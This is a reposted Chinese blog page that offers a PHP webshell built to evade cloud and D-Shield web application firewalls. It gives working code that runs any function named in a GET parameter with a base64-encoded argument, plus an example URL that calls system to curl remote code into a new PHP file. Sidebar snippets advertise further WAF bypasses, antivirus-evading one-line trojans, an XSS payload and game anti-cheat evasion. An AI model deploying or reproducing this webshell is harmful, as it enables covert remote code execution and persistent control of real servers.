[脚本编程] 过云盾、D盾各种盾shell

最新推荐文章于 2024-05-09 11:59:10 发布
最新推荐文章于 2024-05-09 11:59:10 发布
阅读量703 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/dongchi/p/4975560.html
本文介绍了一种通过特定参数调用PHP脚本的方法,能够绕过云盾等安全防护,实现远程代码的执行与写入。示例中利用了system函数与curl结合,从远程服务器获取代码并写入本地文件。 
作者:
dean

 


<?php
 
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';
foreach(array($id) as $v){
    $s.=$v;
}
ob_start($s);
if($catid){
        echo $catid;
}
ob_end_flush();
?>

用方法

参数 id :  需要执行的函数
参数catid : 函数的参数(需要用base_64encode函数转一下)

例如:

http://www.php0.net/test.php?id=system&catid=Y3VybCBodHRwOi8vbG9jYWxob3N0L20udHh0ID4yLnBocA==

则调用system函数,而参数内容为: curl http://localhost/m.txt >2.php

读取远程的代码,并写入本地。

转载于:https://www.cnblogs.com/dongchi/p/4975560.html

c/c++游戏逆向驱动开发,游戏辅助保护
a772336300的博客
06-29 2439
功能介绍:1.降低游戏权限,提升游戏权限,禁止游戏后台截图。2.保护进程,隐藏进程,进程内存不被读取。如图: 部分功能展示: 演示程序下载:c/c++游戏逆向驱动开发,游戏辅助保护-桌面系统文档类资源-优快云下载使用效果图如下:(更多功能自行下载测试,测试觉得有用的铁铁可以联系我)...
绕过云盾找真实IP-找真实IP-绕过CDN
aiquan9342的博客
04-09 2056
目标站:www.chinaparkview.cn 云盾挡着了 查一下历史IP 查出3月9号的IP是103.249.104.114 当然查出来的不一定准确 修改本地host文件 PS:不要加http 然后保存。 win的需要重启。linunx则不用 如果说重启以后pingwww.chinaparkview.cn的IP还是103.249.104.114的话说明...
深入waf绕过 (云盾,宝塔,安全狗)(19)
san3144393495的博客
05-07 6199
这个意思是他接受php后面的参数id,这个静态资源什么意思,这个waf很有可能过滤的是基于脚本类型的参数,也就是针对这种脚本类型的文件在进行过滤,针对某一些其他格式就不会过滤,比如图片格式文本格式,因为图片和文本格式一般不会带参数,造成不了危害,只有脚本里面有代码,或者是图片的代码没有危害,waf设计的时候就针对脚本格式和后缀里面的参数进行拦截,从网络层获取的 ip,这种一般伪造不来,如果是获取客户端的 IP,这样就可能存在伪造 IP 绕过的情。从请求来的数据包里面添加上面这五类。第二种方式 静态资源。
PHP过D免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D,可用菜刀直接连接!
绕过阿里云盾进行XSS
weixin_34221036的博客
11-16 2687
Payload如下所示: 1 <imgsrc=#onerror=alert`2`> 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1944532,如需转载请自行联系原作者 ...
php大马过安全狗D云锁
04-10
php大马过安全狗D云锁
通用易语言,游戏源码
最新发布
01-06
它的设计宗旨是“让编程变得简单”,因此在快速开发小型应用和辅助脚本方面具有一定的优势。 游戏源码可能是指用于网络游戏中的一种防护软件或系统源代码。网络游戏由于需要处理大量网络数据,面临各种网络攻击和...
快速指南:使用Shell脚本一键卸载阿里云盾监控
3. 关于Shell脚本Shell脚本语言非常灵活,可以进行条件判断、循环、函数定义等高级编程操作。在系统管理、自动化运维、数据分析等领域都有广泛应用。 4. 关于安全证书:证书的校验是确保网络通信安全的重要环节。...
云盾网络验证.zip
05-29
云盾网络验证可以与e相比,当然可以说超越他的存在,当然只是听说哦,云盾网络验证可以与e相比,当然可以说超越他的存在,当然只是听说哦,云盾网络验证可以与e相比,当然可以说超越他的存在,...
E定制版模块v37 易语言
06-28
E定制版模块v37 易语言
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
科迅免杀php一句话_php免杀一句话[2016最新过狗过等一切防火墙一句话]
weixin_31016735的博客
12-30 316
php免杀一句话[2016最新过狗过等一切防火墙一句话]常用一句话木马asp一句话木马:php一句话木马:aspx一句话木马:其他一句话木马:"" Then Execute(Request("value"))%>""then session("value")=request("value"):end if:if session("value")<>"" then execute...
【突破韩国Np保护,玩转按键精灵】过按键精灵使用时,GameGuard nProtect保护游戏掉线问题。
luoqiaoliang的博客
05-09 2653
你是否遇到使用按键精灵时,老是被游戏的NP保护检测出非法程序。让你制作脚本时非常苦恼,那么今天这个视频也许是你想看到的,我们一起干翻棒子的NP
一句话木马的变形
qq_45751902的博客
10-25 2169
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。使用方法:先用浏览器访问,生成新的文件"hello.php",再连接"hello.php"。这里是base64解密函数,"YXNzZXJ0"是assert的base64加密。第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。,按照PHP的格式,表达式在两个“/”之间。把用户传递的数据生成一个函数fun(),然后再执行fun()。利用函数生成文件,第一个参数是文件名,第二个参数是文件的内容。
python 异或_随机异或无限免杀D之再免杀
weixin_39949297的博客
12-04 482
项目分析随机异或无限免杀D项目分析首先分析随机异或无限免杀D的github项目:https://github.com/yzddmr6/webshell-venom1,首先分析其生成的木马样例:(当前已经不免杀)...
PHP的常见函数(持续补充)
m0_73303597的博客
11-15 577
自用
一键免杀D(webshell-venom 3.0 发布) ——yzddMr6
yzddMr6的博客
11-06 1868
前言 我承诺过300个星后放出3.0 项目地址: https://github.com/yzddmr6/webshell-venom webshell-venom 3.0 更新特点: 1. 修复已知问题:宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加 2. 变量全员随机化,不再有固定的变量名称 3. 增...
绕过D一句话
Home to come
04-16 1166
通过网上各种渠道搜索,我一共上传了16个php文件,只有两个文件成功绕过了D 1. <?php eval('' . get() . ''); /** * @return string */ function get() { $get = $_GET['password']; return $get; } <?php $a=1;$b="a=".$_GE...
WAF绕过-权限控制之代码混淆及行为造轮子
硫酸超的博客
09-28 1538
WAF绕过-权限控制之代码混淆及行为造轮子
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值